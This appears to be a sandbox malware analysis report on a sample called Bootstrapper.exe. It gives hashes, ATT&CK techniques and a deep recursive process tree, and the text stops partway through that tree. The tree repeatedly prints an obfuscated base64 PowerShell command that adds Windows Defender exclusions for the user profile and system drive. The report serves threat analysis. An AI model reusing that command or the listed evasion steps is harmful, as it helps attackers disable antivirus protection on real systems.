43d7d31f381753d5e4335a10e9b068f2454536b606520ab4432b3c87528c2f82

Analysis

max time kernel
3s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01/09/2024, 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bootstrapper.exe
Size

5.9MB
MD5

3b1001b7fbc3df8979b738fe0e6b2e94
SHA1

38e286d6537a5dfc8f6d780f6855619fef2c8a75
SHA256

f6b7bbef0c8a6061563078824052551b1cd7a558f22d06cd427889c0088fe498
SHA512

da96b03811b507e6a851c7a6870e9fa383a1850d0090fd7766be65d341d434e80003c1c95b2ef582462466f46f4c6074d466ef5926caa6a654d5a3581f912886
SSDEEP

98304:wyTvgk+d41nz7yiiIqFmX9//u4iYrVYtgkrEm/srjft6xU0ejqIam1mjp0AF:NTgnd8nnybIqFs9SYrVYaaE3tT09m1QB

Score

8^/10

defense_evasion discovery evasion execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5916	powershell.exe
8720	powershell.exe
3108	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe

Executes dropped EXE 5 IoCs

pid	Process
2296	setup.exe
60	setup.exe
2364	setup.exe
4764	setup.exe
4168	setup.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3080	powercfg.exe
1636	powercfg.exe
8960	powercfg.exe
5332	powercfg.exe
2252	powercfg.exe
6248	powercfg.exe
6104	powercfg.exe
9096	powercfg.exe

Launches sc.exe 16 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5420	sc.exe
6152	sc.exe
4924	sc.exe
5988	sc.exe
7936	sc.exe
5508	sc.exe
6696	sc.exe
8596	sc.exe
5840	sc.exe
872	sc.exe
5684	sc.exe
4584	sc.exe
6856	sc.exe
4980	sc.exe
5724	sc.exe
7868	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4884	powershell.exe
3856	powershell.exe
3856	powershell.exe
2216	powershell.exe
4884	powershell.exe
4748	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 3352 wrote to memory of 4884	3352	Bootstrapper.exe	85
PID 3352 wrote to memory of 4884	3352	Bootstrapper.exe	85
PID 3352 wrote to memory of 4884	3352	Bootstrapper.exe	85
PID 3352 wrote to memory of 1272	3352	Bootstrapper.exe	87
PID 3352 wrote to memory of 1272	3352	Bootstrapper.exe	87
PID 3352 wrote to memory of 1272	3352	Bootstrapper.exe	87
PID 3352 wrote to memory of 2296	3352	Bootstrapper.exe	88
PID 3352 wrote to memory of 2296	3352	Bootstrapper.exe	88
PID 1272 wrote to memory of 3856	1272	Bootstrapper.exe	89
PID 1272 wrote to memory of 3856	1272	Bootstrapper.exe	89
PID 1272 wrote to memory of 3856	1272	Bootstrapper.exe	89
PID 1272 wrote to memory of 2904	1272	Bootstrapper.exe	91
PID 1272 wrote to memory of 2904	1272	Bootstrapper.exe	91
PID 1272 wrote to memory of 2904	1272	Bootstrapper.exe	91
PID 1272 wrote to memory of 60	1272	Bootstrapper.exe	92
PID 1272 wrote to memory of 60	1272	Bootstrapper.exe	92
PID 2904 wrote to memory of 2216	2904	Bootstrapper.exe	93
PID 2904 wrote to memory of 2216	2904	Bootstrapper.exe	93
PID 2904 wrote to memory of 2216	2904	Bootstrapper.exe	93
PID 2904 wrote to memory of 1504	2904	Bootstrapper.exe	311
PID 2904 wrote to memory of 1504	2904	Bootstrapper.exe	311
PID 2904 wrote to memory of 1504	2904	Bootstrapper.exe	311
PID 2904 wrote to memory of 2364	2904	Bootstrapper.exe	338
PID 2904 wrote to memory of 2364	2904	Bootstrapper.exe	338
PID 1504 wrote to memory of 4748	1504	Bootstrapper.exe	97
PID 1504 wrote to memory of 4748	1504	Bootstrapper.exe	97
PID 1504 wrote to memory of 4748	1504	Bootstrapper.exe	97
PID 1504 wrote to memory of 4740	1504	Bootstrapper.exe	127
PID 1504 wrote to memory of 4740	1504	Bootstrapper.exe	127
PID 1504 wrote to memory of 4740	1504	Bootstrapper.exe	127
PID 1504 wrote to memory of 4764	1504	Bootstrapper.exe	100
PID 1504 wrote to memory of 4764	1504	Bootstrapper.exe	100
PID 4740 wrote to memory of 4880	4740	Bootstrapper.exe	287
PID 4740 wrote to memory of 4880	4740	Bootstrapper.exe	287
PID 4740 wrote to memory of 4880	4740	Bootstrapper.exe	287
PID 4740 wrote to memory of 2468	4740	Bootstrapper.exe	102
PID 4740 wrote to memory of 2468	4740	Bootstrapper.exe	102
PID 4740 wrote to memory of 2468	4740	Bootstrapper.exe	102
PID 4740 wrote to memory of 4168	4740	Bootstrapper.exe	104
PID 4740 wrote to memory of 4168	4740	Bootstrapper.exe	104
PID 2468 wrote to memory of 1980	2468	Bootstrapper.exe	105
PID 2468 wrote to memory of 1980	2468	Bootstrapper.exe	105
PID 2468 wrote to memory of 1980	2468	Bootstrapper.exe	105
PID 2468 wrote to memory of 2788	2468	Bootstrapper.exe	107
PID 2468 wrote to memory of 2788	2468	Bootstrapper.exe	107
PID 2468 wrote to memory of 2788	2468	Bootstrapper.exe	107

C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3352
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4884
- C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3856
- - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4740
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4880
      - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        7⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        7⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        8⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        8⤵
        
        PID:4000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        9⤵
        
        PID:3568
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        9⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        10⤵
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        10⤵
        
        PID:4240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        11⤵
        
        PID:4832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        11⤵
        
        PID:2136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        12⤵
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        12⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        13⤵
        
        PID:3492
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        13⤵
        
        PID:636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        14⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        14⤵
        
        PID:3932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        15⤵
        
        PID:5328
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        15⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        16⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        16⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        17⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        17⤵
        
        PID:4576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        18⤵
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        18⤵
        
        PID:5496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        19⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        19⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        20⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        20⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        21⤵
        
        PID:6344
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        21⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        22⤵
        
        PID:6724
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        22⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAdQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAYgByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAdwBuACMAPgA="
        23⤵
        
        PID:7016
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        23⤵
        
        PID:7052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
